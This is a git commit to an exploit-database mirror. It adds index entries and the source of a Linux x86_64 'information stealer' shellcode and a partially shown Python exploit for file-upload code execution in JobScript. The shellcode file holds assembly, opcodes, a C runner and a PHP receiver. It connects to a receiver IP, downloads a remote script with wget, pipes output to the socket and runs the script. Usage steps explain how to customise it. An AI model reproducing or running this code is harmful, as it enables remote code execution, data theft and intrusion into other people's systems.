DB: 2016-05-24
5 new exploits Operation Technology ETAP 14.1.0 - Local Privilege Escalation Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities Linux x86_64 Information Stealer Shellcode Job Script by Scubez - Remote Code Execution XenAPI 1.4.1 for XenForo - Multiple SQL Injections
This commit is contained in:
parent
84d38df739
commit
399580a6c2
6 changed files with 1606 additions and 0 deletions
|
@ -36029,3 +36029,8 @@ id,file,description,date,author,platform,type,port
|
||||||
39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0
|
39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0
|
||||||
39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0
|
39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0
|
||||||
39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0
|
39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0
|
||||||
|
39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Local Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0
|
||||||
|
39846,platforms/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,windows,dos,0
|
||||||
|
39847,platforms/lin_x86-64/shellcode/39847.c,"Linux x86_64 Information Stealer Shellcode",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
|
||||||
|
39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
|
||||||
|
39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
|
||||||
|
|
Can't render this file because it is too large.
|
576
platforms/lin_x86-64/shellcode/39847.c
Executable file
576
platforms/lin_x86-64/shellcode/39847.c
Executable file
|
@ -0,0 +1,576 @@
|
||||||
|
/*
|
||||||
|
# Title : Linux x86_64 information stealer
|
||||||
|
# Date : 23-05-2016
|
||||||
|
# Author : Roziul Hasan Khan Shifat
|
||||||
|
# Tested On : Ubuntu 14.04 LTS x86_64
|
||||||
|
# Contact : shifath12@gmail.com
|
||||||
|
|
||||||
|
*/
|
||||||
|
|
||||||
|
|
||||||
|
/*
|
||||||
|
How does this shellcode works
|
||||||
|
-----------------------------------
|
||||||
|
1. First it connects to the information reciver
|
||||||
|
2. then it download a sh script from http://192.168.30.129/pri.sh (server running on Kali linux)
|
||||||
|
3. duplicating stdout,stderr with socket descriptor
|
||||||
|
4. then it execute the script using sh
|
||||||
|
|
||||||
|
*/
|
||||||
|
|
||||||
|
/*
|
||||||
|
|
||||||
|
Note: the pri.sh file was in kali linux.the server was Kali linux
|
||||||
|
client was Ubuntu
|
||||||
|
it downloads the pri.sh from kali linux
|
||||||
|
and Executes it on Ubuntu
|
||||||
|
*/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
/*
|
||||||
|
Requirements of this shellcode
|
||||||
|
--------------------------------------
|
||||||
|
1.link of pri.sh (You can Found it on http://pastebin.com/V4gudKL5 ) . this script isn't mine.I've taken it from another.I customized the script
|
||||||
|
2.reciver ip
|
||||||
|
|
||||||
|
*/
|
||||||
|
|
||||||
|
|
||||||
|
/*
|
||||||
|
How to use this shellcode
|
||||||
|
---------------------------------
|
||||||
|
1. Upload the pri.sh any site
|
||||||
|
2. TO download the pri.sh , U need to Customize the wget procedure (I've marked where to customized)
|
||||||
|
3. Customize the connect procedure for connect to the reciver where i marked
|
||||||
|
4. U need to know assembly to completed 1,2 instruction
|
||||||
|
|
||||||
|
*/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
/*
|
||||||
|
Reciver
|
||||||
|
---------
|
||||||
|
To recive the Information U may Use Netcat
|
||||||
|
If U want to view the informations on Web browser , I've a php script for U. upload it any site.
|
||||||
|
|
||||||
|
|
||||||
|
<?php
|
||||||
|
|
||||||
|
if (!($sock = socket_create(AF_INET, SOCK_STREAM, 0)))
|
||||||
|
{
|
||||||
|
$errorcode = socket_last_error();
|
||||||
|
$errormsg = socket_strerror($errorcode);
|
||||||
|
|
||||||
|
die ("Couldn't create socket: [$errorcode] $errormsg \n");}
|
||||||
|
echo "Socket created \n\n";
|
||||||
|
|
||||||
|
if ( !socket_bind($sock, "0.0.0.0" , 1532) )
|
||||||
|
{
|
||||||
|
$errorcode = socket_last_error();
|
||||||
|
$errormsg = socket_strerror($errorcode);
|
||||||
|
|
||||||
|
die ("Could not bind socket : [$errorcode] $errormsg \n");}
|
||||||
|
echo "Socket bind OK \n\n";
|
||||||
|
if (!socket_listen ($sock , 10))
|
||||||
|
{
|
||||||
|
$errorcode = socket_last_error();
|
||||||
|
$errormsg = socket_strerror($errorcode);
|
||||||
|
|
||||||
|
die ("Could not listen on socket : [$errorcode] $errormsg \n");}
|
||||||
|
echo "Socket listen OK \n\n\n";
|
||||||
|
|
||||||
|
echo "Waiting for incoming connections... \n";
|
||||||
|
//Accept incoming connection - This is a blocking call
|
||||||
|
$client = socket_accept($sock);
|
||||||
|
//display information about the client who is connected
|
||||||
|
if (socket_getpeername($client , $address , $port))
|
||||||
|
{
|
||||||
|
echo "Client $address : $port is now connected to us. \n";
|
||||||
|
}
|
||||||
|
//read data from the incoming socket
|
||||||
|
while(1)
|
||||||
|
{
|
||||||
|
|
||||||
|
$i= socket_recv($client,$buf, 1024000,MSG_WAITALL);
|
||||||
|
|
||||||
|
if($i<=0)
|
||||||
|
die("\nconnection closed by $address");
|
||||||
|
else
|
||||||
|
echo $buf."\n\n";
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
|
||||||
|
if U this script , the reciver ip will be the website ip
|
||||||
|
|
||||||
|
BUT I RECOMMEND U TO USE NETCAT
|
||||||
|
|
||||||
|
|
||||||
|
*/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
/*
|
||||||
|
|
||||||
|
Disassembly of section .text:
|
||||||
|
|
||||||
|
0000000000400080 <_start>:
|
||||||
|
400080: 6a 06 pushq $0x6
|
||||||
|
400082: 6a 01 pushq $0x1
|
||||||
|
400084: 6a 02 pushq $0x2
|
||||||
|
400086: 5f pop %rdi
|
||||||
|
400087: 5e pop %rsi
|
||||||
|
400088: 5a pop %rdx
|
||||||
|
400089: 6a 29 pushq $0x29
|
||||||
|
40008b: 58 pop %rax
|
||||||
|
40008c: 0f 05 syscall
|
||||||
|
40008e: 48 31 db xor %rbx,%rbx
|
||||||
|
400091: 48 89 c3 mov %rax,%rbx
|
||||||
|
400094: 48 31 c0 xor %rax,%rax
|
||||||
|
400097: 48 31 ff xor %rdi,%rdi
|
||||||
|
40009a: b0 39 mov $0x39,%al
|
||||||
|
40009c: 0f 05 syscall
|
||||||
|
40009e: 4d 31 c9 xor %r9,%r9
|
||||||
|
4000a1: 4c 39 c8 cmp %r9,%rax
|
||||||
|
4000a4: 74 18 je 4000be <connect>
|
||||||
|
4000a6: 6a 3c pushq $0x3c
|
||||||
|
4000a8: 58 pop %rax
|
||||||
|
4000a9: 0f 05 syscall
|
||||||
|
|
||||||
|
00000000004000ab <retry>:
|
||||||
|
4000ab: 48 31 f6 xor %rsi,%rsi
|
||||||
|
4000ae: 48 f7 e6 mul %rsi
|
||||||
|
4000b1: 56 push %rsi
|
||||||
|
4000b2: 6a 3c pushq $0x3c
|
||||||
|
4000b4: 48 89 e7 mov %rsp,%rdi
|
||||||
|
4000b7: b0 23 mov $0x23,%al
|
||||||
|
4000b9: 0f 05 syscall
|
||||||
|
4000bb: eb 01 jmp 4000be <connect>
|
||||||
|
4000bd: c3 retq
|
||||||
|
|
||||||
|
00000000004000be <connect>:
|
||||||
|
4000be: 6a 10 pushq $0x10
|
||||||
|
4000c0: 5a pop %rdx
|
||||||
|
4000c1: 53 push %rbx
|
||||||
|
4000c2: 5f pop %rdi
|
||||||
|
4000c3: 48 31 c0 xor %rax,%rax
|
||||||
|
4000c6: 50 push %rax
|
||||||
|
4000c7: 50 push %rax
|
||||||
|
4000c8: 50 push %rax
|
||||||
|
4000c9: c6 04 24 02 movb $0x2,(%rsp)
|
||||||
|
4000cd: 66 c7 44 24 02 05 fc movw $0xfc05,0x2(%rsp)
|
||||||
|
4000d4: c7 44 24 04 c0 a8 1e movl $0x811ea8c0,0x4(%rsp)
|
||||||
|
4000db: 81
|
||||||
|
4000dc: 48 89 e6 mov %rsp,%rsi
|
||||||
|
4000df: b0 2a mov $0x2a,%al
|
||||||
|
4000e1: 0f 05 syscall
|
||||||
|
4000e3: 48 31 ff xor %rdi,%rdi
|
||||||
|
4000e6: 48 39 f8 cmp %rdi,%rax
|
||||||
|
4000e9: 7c c0 jl 4000ab <retry>
|
||||||
|
4000eb: 48 31 c0 xor %rax,%rax
|
||||||
|
4000ee: 48 31 f6 xor %rsi,%rsi
|
||||||
|
4000f1: 48 ff c6 inc %rsi
|
||||||
|
4000f4: 48 89 df mov %rbx,%rdi
|
||||||
|
4000f7: b0 21 mov $0x21,%al
|
||||||
|
4000f9: 0f 05 syscall
|
||||||
|
4000fb: 48 31 c0 xor %rax,%rax
|
||||||
|
4000fe: 48 ff c6 inc %rsi
|
||||||
|
400101: 48 89 df mov %rbx,%rdi
|
||||||
|
400104: b0 21 mov $0x21,%al
|
||||||
|
400106: 0f 05 syscall
|
||||||
|
400108: 48 31 c0 xor %rax,%rax
|
||||||
|
40010b: 48 83 c0 39 add $0x39,%rax
|
||||||
|
40010f: 0f 05 syscall
|
||||||
|
400111: 48 31 ff xor %rdi,%rdi
|
||||||
|
400114: 4d 31 e4 xor %r12,%r12
|
||||||
|
400117: 49 89 c4 mov %rax,%r12
|
||||||
|
40011a: 48 39 f8 cmp %rdi,%rax
|
||||||
|
40011d: 74 59 je 400178 <wget>
|
||||||
|
40011f: 4d 31 d2 xor %r10,%r10
|
||||||
|
400122: 48 31 d2 xor %rdx,%rdx
|
||||||
|
400125: 4c 89 d6 mov %r10,%rsi
|
||||||
|
400128: 4c 89 e7 mov %r12,%rdi
|
||||||
|
40012b: 48 31 c0 xor %rax,%rax
|
||||||
|
40012e: b0 3d mov $0x3d,%al
|
||||||
|
400130: 0f 05 syscall
|
||||||
|
400132: 48 31 c0 xor %rax,%rax
|
||||||
|
400135: 48 31 d2 xor %rdx,%rdx
|
||||||
|
400138: 50 push %rax
|
||||||
|
400139: 50 push %rax
|
||||||
|
40013a: c7 04 24 2f 2f 62 69 movl $0x69622f2f,(%rsp)
|
||||||
|
400141: c7 44 24 04 6e 2f 73 movl $0x68732f6e,0x4(%rsp)
|
||||||
|
400148: 68
|
||||||
|
400149: 48 89 e7 mov %rsp,%rdi
|
||||||
|
40014c: 50 push %rax
|
||||||
|
40014d: 50 push %rax
|
||||||
|
40014e: c7 04 24 2e 70 72 69 movl $0x6972702e,(%rsp)
|
||||||
|
400155: 66 c7 44 24 04 2e 73 movw $0x732e,0x4(%rsp)
|
||||||
|
40015c: c6 44 24 06 68 movb $0x68,0x6(%rsp)
|
||||||
|
400161: 48 89 e6 mov %rsp,%rsi
|
||||||
|
400164: 52 push %rdx
|
||||||
|
400165: 56 push %rsi
|
||||||
|
400166: 57 push %rdi
|
||||||
|
400167: 48 89 e6 mov %rsp,%rsi
|
||||||
|
40016a: 48 83 c0 3b add $0x3b,%rax
|
||||||
|
40016e: 0f 05 syscall
|
||||||
|
400170: 41 51 push %r9
|
||||||
|
400172: 5f pop %rdi
|
||||||
|
400173: 6a 03 pushq $0x3
|
||||||
|
400175: 58 pop %rax
|
||||||
|
400176: 0f 05 syscall
|
||||||
|
|
||||||
|
0000000000400178 <wget>:
|
||||||
|
400178: 48 31 c0 xor %rax,%rax
|
||||||
|
40017b: 50 push %rax
|
||||||
|
40017c: 50 push %rax
|
||||||
|
40017d: 50 push %rax
|
||||||
|
40017e: c7 04 24 2f 75 73 72 movl $0x7273752f,(%rsp)
|
||||||
|
400185: c7 44 24 04 2f 62 69 movl $0x6e69622f,0x4(%rsp)
|
||||||
|
40018c: 6e
|
||||||
|
40018d: c7 44 24 08 2f 2f 77 movl $0x67772f2f,0x8(%rsp)
|
||||||
|
400194: 67
|
||||||
|
400195: 66 c7 44 24 0c 65 74 movw $0x7465,0xc(%rsp)
|
||||||
|
40019c: 48 89 e7 mov %rsp,%rdi
|
||||||
|
40019f: 50 push %rax
|
||||||
|
4001a0: 50 push %rax
|
||||||
|
4001a1: 50 push %rax
|
||||||
|
4001a2: 50 push %rax
|
||||||
|
4001a3: c7 04 24 68 74 74 70 movl $0x70747468,(%rsp)
|
||||||
|
4001aa: c7 44 24 04 3a 2f 2f movl $0x312f2f3a,0x4(%rsp)
|
||||||
|
4001b1: 31
|
||||||
|
4001b2: c7 44 24 08 39 32 2e movl $0x312e3239,0x8(%rsp)
|
||||||
|
4001b9: 31
|
||||||
|
4001ba: c7 44 24 0c 36 38 2e movl $0x332e3836,0xc(%rsp)
|
||||||
|
4001c1: 33
|
||||||
|
4001c2: c7 44 24 10 30 2e 31 movl $0x32312e30,0x10(%rsp)
|
||||||
|
4001c9: 32
|
||||||
|
4001ca: c7 44 24 14 39 2f 70 movl $0x72702f39,0x14(%rsp)
|
||||||
|
4001d1: 72
|
||||||
|
4001d2: c7 44 24 18 69 2e 73 movl $0x68732e69,0x18(%rsp)
|
||||||
|
4001d9: 68
|
||||||
|
4001da: 48 89 e6 mov %rsp,%rsi
|
||||||
|
4001dd: 48 31 d2 xor %rdx,%rdx
|
||||||
|
4001e0: 50 push %rax
|
||||||
|
4001e1: 66 c7 04 24 2d 4f movw $0x4f2d,(%rsp)
|
||||||
|
4001e7: 48 89 e1 mov %rsp,%rcx
|
||||||
|
4001ea: 50 push %rax
|
||||||
|
4001eb: 50 push %rax
|
||||||
|
4001ec: c7 04 24 2e 70 72 69 movl $0x6972702e,(%rsp)
|
||||||
|
4001f3: 66 c7 44 24 04 2e 73 movw $0x732e,0x4(%rsp)
|
||||||
|
4001fa: c6 44 24 06 68 movb $0x68,0x6(%rsp)
|
||||||
|
4001ff: 49 89 e7 mov %rsp,%r15
|
||||||
|
400202: 52 push %rdx
|
||||||
|
400203: 41 57 push %r15
|
||||||
|
400205: 51 push %rcx
|
||||||
|
400206: 56 push %rsi
|
||||||
|
400207: 57 push %rdi
|
||||||
|
400208: 48 89 e6 mov %rsp,%rsi
|
||||||
|
40020b: b0 3b mov $0x3b,%al
|
||||||
|
40020d: 0f 05 syscall
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
*/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
/*
|
||||||
|
|
||||||
|
|
||||||
|
section .text
|
||||||
|
global _start
|
||||||
|
;-----------------
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
_start:
|
||||||
|
|
||||||
|
;socket()
|
||||||
|
push 6
|
||||||
|
push 1
|
||||||
|
push 2
|
||||||
|
|
||||||
|
pop rdi
|
||||||
|
pop rsi
|
||||||
|
pop rdx
|
||||||
|
|
||||||
|
push 41
|
||||||
|
pop rax
|
||||||
|
syscall
|
||||||
|
|
||||||
|
;------------------
|
||||||
|
|
||||||
|
xor rbx,rbx
|
||||||
|
mov rbx,rax ;socket descriptor
|
||||||
|
|
||||||
|
;-------------
|
||||||
|
xor rax,rax
|
||||||
|
xor rdi,rdi
|
||||||
|
|
||||||
|
mov al,57
|
||||||
|
syscall
|
||||||
|
|
||||||
|
xor r9,r9
|
||||||
|
|
||||||
|
cmp rax,r9
|
||||||
|
jz connect
|
||||||
|
|
||||||
|
push byte 60
|
||||||
|
pop rax
|
||||||
|
syscall
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
retry:
|
||||||
|
|
||||||
|
xor rsi,rsi
|
||||||
|
mul rsi
|
||||||
|
|
||||||
|
push rsi
|
||||||
|
push byte 60 ;1 min ( change it if U want )
|
||||||
|
|
||||||
|
mov rdi,rsp
|
||||||
|
|
||||||
|
mov al,35
|
||||||
|
syscall
|
||||||
|
|
||||||
|
jmp connect
|
||||||
|
ret
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
connect:
|
||||||
|
|
||||||
|
;connect()
|
||||||
|
push 16
|
||||||
|
pop rdx
|
||||||
|
|
||||||
|
push rbx
|
||||||
|
pop rdi
|
||||||
|
|
||||||
|
xor rax,rax
|
||||||
|
push rax
|
||||||
|
push rax
|
||||||
|
push rax
|
||||||
|
|
||||||
|
mov [rsp],byte 2
|
||||||
|
|
||||||
|
;-----------------------------------
|
||||||
|
;customize these staetments
|
||||||
|
mov [rsp+2],word 0xfc05 ;port 1532 ( U may change it, As U wish )
|
||||||
|
mov [rsp+4],dword 0x811ea8c0 ;ip of reciver (must change it)
|
||||||
|
;--------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
mov rsi,rsp
|
||||||
|
|
||||||
|
mov al,42
|
||||||
|
syscall
|
||||||
|
|
||||||
|
xor rdi,rdi
|
||||||
|
cmp rax,rdi
|
||||||
|
jl retry
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
;------------dup2(sd,1)
|
||||||
|
|
||||||
|
xor rax,rax
|
||||||
|
xor rsi,rsi
|
||||||
|
inc rsi
|
||||||
|
|
||||||
|
mov rdi,rbx
|
||||||
|
|
||||||
|
mov al,33
|
||||||
|
syscall
|
||||||
|
|
||||||
|
;------------
|
||||||
|
|
||||||
|
;------------dup2(sd,2)
|
||||||
|
|
||||||
|
xor rax,rax
|
||||||
|
|
||||||
|
inc rsi
|
||||||
|
|
||||||
|
mov rdi,rbx
|
||||||
|
|
||||||
|
mov al,33
|
||||||
|
syscall
|
||||||
|
|
||||||
|
;------------
|
||||||
|
;fork()
|
||||||
|
|
||||||
|
xor rax,rax
|
||||||
|
add rax,57
|
||||||
|
syscall
|
||||||
|
|
||||||
|
xor rdi,rdi
|
||||||
|
xor r12,r12
|
||||||
|
|
||||||
|
mov r12,rax ;pid
|
||||||
|
cmp rax,rdi
|
||||||
|
|
||||||
|
jz wget
|
||||||
|
|
||||||
|
;---------------
|
||||||
|
;wait4()
|
||||||
|
|
||||||
|
xor r10,r10 ;null
|
||||||
|
xor rdx,rdx ;null
|
||||||
|
mov rsi,r10 ;status
|
||||||
|
mov rdi,r12 ;pid
|
||||||
|
|
||||||
|
xor rax,rax
|
||||||
|
mov al,61
|
||||||
|
syscall
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
;;
|
||||||
|
;-------------------------
|
||||||
|
|
||||||
|
;execve("//bin/sh",{"//bin/sh",".pri.sh",NULL},NULL);
|
||||||
|
|
||||||
|
xor rax,rax
|
||||||
|
xor rdx,rdx
|
||||||
|
push rax
|
||||||
|
push rax
|
||||||
|
|
||||||
|
|
||||||
|
mov [rsp],dword '//bi'
|
||||||
|
mov [rsp+4],dword 'n/sh'
|
||||||
|
|
||||||
|
|
||||||
|
mov rdi,rsp
|
||||||
|
|
||||||
|
|
||||||
|
push rax
|
||||||
|
push rax
|
||||||
|
|
||||||
|
mov [rsp],dword '.pri'
|
||||||
|
mov [rsp+4],word '.s'
|
||||||
|
mov [rsp+6],byte 'h'
|
||||||
|
mov rsi,rsp
|
||||||
|
|
||||||
|
push rdx
|
||||||
|
push rsi
|
||||||
|
push rdi
|
||||||
|
|
||||||
|
mov rsi,rsp
|
||||||
|
|
||||||
|
add rax,59
|
||||||
|
syscall
|
||||||
|
;--------
|
||||||
|
;close(fd)
|
||||||
|
|
||||||
|
push r9
|
||||||
|
pop rdi
|
||||||
|
|
||||||
|
push 3
|
||||||
|
pop rax
|
||||||
|
syscall
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
wget:
|
||||||
|
;execve("/usr/bin//wget",{"/usr/bin//wget","http ://1 92.1 68.3 0.12 9/pr i.sh","-O",".pri.sh",NULL},NULL)
|
||||||
|
|
||||||
|
xor rax,rax
|
||||||
|
|
||||||
|
|
||||||
|
push rax
|
||||||
|
push rax
|
||||||
|
push rax
|
||||||
|
|
||||||
|
mov [rsp],dword '/usr'
|
||||||
|
mov [rsp+4],dword '/bin'
|
||||||
|
mov [rsp+8],dword '//wg'
|
||||||
|
mov [rsp+12],word 'et'
|
||||||
|
|
||||||
|
mov rdi,rsp
|
||||||
|
|
||||||
|
push rax
|
||||||
|
push rax
|
||||||
|
push rax
|
||||||
|
push rax
|
||||||
|
|
||||||
|
;----------------------
|
||||||
|
;cusmizetd these statements for the link of pri.sh
|
||||||
|
mov [rsp],dword 'http'
|
||||||
|
mov [rsp+4],dword '://1'
|
||||||
|
mov [rsp+8],dword '92.1'
|
||||||
|
mov [rsp+12],dword '68.3'
|
||||||
|
mov [rsp+16],dword '0.12'
|
||||||
|
mov [rsp+20],dword '9/pr'
|
||||||
|
mov [rsp+24],dword 'i.sh'
|
||||||
|
;------------------------
|
||||||
|
|
||||||
|
mov rsi,rsp
|
||||||
|
xor rdx,rdx
|
||||||
|
|
||||||
|
push rax
|
||||||
|
mov [rsp],word '-O'
|
||||||
|
mov rcx,rsp
|
||||||
|
|
||||||
|
push rax
|
||||||
|
push rax
|
||||||
|
|
||||||
|
mov [rsp],dword '.pri'
|
||||||
|
mov [rsp+4],word '.s'
|
||||||
|
mov [rsp+6],byte 'h'
|
||||||
|
|
||||||
|
mov r15,rsp
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
push rdx
|
||||||
|
push r15
|
||||||
|
push rcx
|
||||||
|
push rsi
|
||||||
|
push rdi
|
||||||
|
|
||||||
|
mov rsi,rsp
|
||||||
|
|
||||||
|
mov al,59
|
||||||
|
syscall
|
||||||
|
|
||||||
|
|
||||||
|
*/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
#include<stdio.h>
|
||||||
|
#include<string.h>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
char shellcode[]="\x6a\x06\x6a\x01\x6a\x02\x5f\x5e\x5a\x6a\x29\x58\x0f\x05\x48\x31\xdb\x48\x89\xc3\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x4d\x31\xc9\x4c\x39\xc8\x74\x18\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x56\x6a\x3c\x48\x89\xe7\xb0\x23\x0f\x05\xeb\x01\xc3\x6a\x10\x5a\x53\x5f\x48\x31\xc0\x50\x50\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\xfc\xc7\x44\x24\x04\xc0\xa8\x1e\x81\x48\x89\xe6\xb0\x2a\x0f\x05\x48\x31\xff\x48\x39\xf8\x7c\xc0\x48\x31\xc0\x48\x31\xf6\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\x83\xc0\x39\x0f\x05\x48\x31\xff\x4d\x31\xe4\x49\x89\xc4\x48\x39\xf8\x74\x59\x4d\x31\xd2\x48\x31\xd2\x4c\x89\xd6\x4c\x89\xe7\x48\x31\xc0\xb0\x3d\x0f\x05\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\xc7\x04\x24\x2e\x70\x72\x69\x66\xc7\x44\x24\x04\x2e\x73\xc6\x44\x24\x06\x68\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x41\x51\x5f\x6a\x03\x58\x0f\x05\x48\x31\xc0\x50\x50\x50\xc7\x04\x24\x2f\x75\x73\x72\xc7\x44\x24\x04\x2f\x62\x69\x6e\xc7\x44\x24\x08\x2f\x2f\x77\x67\x66\xc7\x44\x24\x0c\x65\x74\x48\x89\xe7\x50\x50\x50\x50\xc7\x04\x24\x68\x74\x74\x70\xc7\x44\x24\x04\x3a\x2f\x2f\x31\xc7\x44\x24\x08\x39\x32\x2e\x31\xc7\x44\x24\x0c\x36\x38\x2e\x33\xc7\x44\x24\x10\x30\x2e\x31\x32\xc7\x44\x24\x14\x39\x2f\x70\x72\xc7\x44\x24\x18\x69\x2e\x73\x68\x48\x89\xe6\x48\x31\xd2\x50\x66\xc7\x04\x24\x2d\x4f\x48\x89\xe1\x50\x50\xc7\x04\x24\x2e\x70\x72\x69\x66\xc7\x44\x24\x04\x2e\x73\xc6\x44\x24\x06\x68\x49\x89\xe7\x52\x41\x57\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"; /* insert shellcode here */
|
||||||
|
|
||||||
|
|
||||||
|
int main()
|
||||||
|
{
|
||||||
|
printf("shellcode length %ld",( unsigned long ) strlen(shellcode));
|
||||||
|
|
||||||
|
( * (int(*)()) shellcode) ();
|
||||||
|
|
||||||
|
}
|
128
platforms/php/webapps/39848.py
Executable file
128
platforms/php/webapps/39848.py
Executable file
|
@ -0,0 +1,128 @@
|
||||||
|
#!C:/Python27/python.exe -u
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# JobScript Remote Code Execution Exploit
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vendor: Jobscript
|
||||||
|
# Product web page: http://www.jobscript.in
|
||||||
|
# Affected version: Unknown
|
||||||
|
#
|
||||||
|
# Summary: JobScript is inbuilt structured website was developed in PHP and MySQL
|
||||||
|
# database. It's a complete job script for those who wants to start a professional
|
||||||
|
# job portal website like naukri.com, monster.com, clickjobs.com or any such major
|
||||||
|
# job portals. Jobscript was designed and developed with the following features like
|
||||||
|
# control panel for Employer's and also for Job Seeker's, email alerts, job search,
|
||||||
|
# online resume, payment and membership plans.
|
||||||
|
#
|
||||||
|
# Desc: JobScript suffers from an authenticated arbitrary PHP code execution. The
|
||||||
|
# vulnerability is caused due to the improper verification of uploaded files in
|
||||||
|
# '/admin-ajax.php' script thru the 'name' and 'file' POST parameters. This can
|
||||||
|
# be exploited to execute arbitrary PHP code by uploading a malicious PHP script
|
||||||
|
# file with '.php' extension (to bypass the '.htaccess' block rule) that will be
|
||||||
|
# stored in '/jobmonster/wp-content/uploads/jobmonster/' directory.
|
||||||
|
#
|
||||||
|
# Tested on: Apache 2.4.9
|
||||||
|
# PHP 5.4.26
|
||||||
|
#
|
||||||
|
# Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
|
||||||
|
#
|
||||||
|
# Zero Science Lab - http://www.zeroscience.mk
|
||||||
|
# Macedonian Information Security Research And Development Laboratory
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Advisory ID: ZSL-2016-5322
|
||||||
|
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5322.php
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# 31.03.2016
|
||||||
|
#
|
||||||
|
|
||||||
|
import itertools, mimetools, mimetypes
|
||||||
|
import cookielib, urllib, urllib2, sys
|
||||||
|
import os, time, re, requests, httplib
|
||||||
|
|
||||||
|
from cStringIO import StringIO
|
||||||
|
from urllib2 import URLError
|
||||||
|
|
||||||
|
global file, file1
|
||||||
|
file = ';nonce'
|
||||||
|
file1 = '"security"'
|
||||||
|
|
||||||
|
host = sys.argv[1]
|
||||||
|
|
||||||
|
cj = cookielib.CookieJar()
|
||||||
|
opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
|
||||||
|
|
||||||
|
prelogin = opener2.open('http://'+host+'/jobmonster/member-2/')
|
||||||
|
output = prelogin.read()
|
||||||
|
|
||||||
|
for line in output.splitlines():
|
||||||
|
if file1 in line:
|
||||||
|
security = str(line.split("=")[4:])[3:13]
|
||||||
|
break
|
||||||
|
|
||||||
|
print 'Login please.'
|
||||||
|
|
||||||
|
username = raw_input('Enter username: ')
|
||||||
|
password = raw_input('Enter password: ')
|
||||||
|
|
||||||
|
login_data = urllib.urlencode({
|
||||||
|
'action' : 'noo_ajax_login',
|
||||||
|
'log' : username,
|
||||||
|
'pwd' : password,
|
||||||
|
'remember' : 'false',
|
||||||
|
'security' : security,
|
||||||
|
'redirect_to' : 'http%3A%2F%2Fcscript.in%2Fjobmonster%2Fmember-2%3Fpagename%3Dmember-2%26logged_in%3D1'
|
||||||
|
})
|
||||||
|
|
||||||
|
login = opener2.open('http://'+host+'/jobmonster/wp-admin/admin-ajax.php', login_data)
|
||||||
|
auth = login.read()
|
||||||
|
|
||||||
|
if re.search(r'false', auth):
|
||||||
|
print 'Incorrect username or password'
|
||||||
|
sys.exit()
|
||||||
|
else:
|
||||||
|
print 'Authenticated'
|
||||||
|
|
||||||
|
response = opener2.open('http://'+host+'/jobmonster/member-2/?pagename=member-2&logged_in=1')
|
||||||
|
response = opener2.open('http://'+host+'/jobmonster/post-a-resume/?action=resume_general')
|
||||||
|
output = response.read()
|
||||||
|
|
||||||
|
for line in output.splitlines():
|
||||||
|
if file in line:
|
||||||
|
nonce = str(line.split("=")[3:])[28:38]
|
||||||
|
|
||||||
|
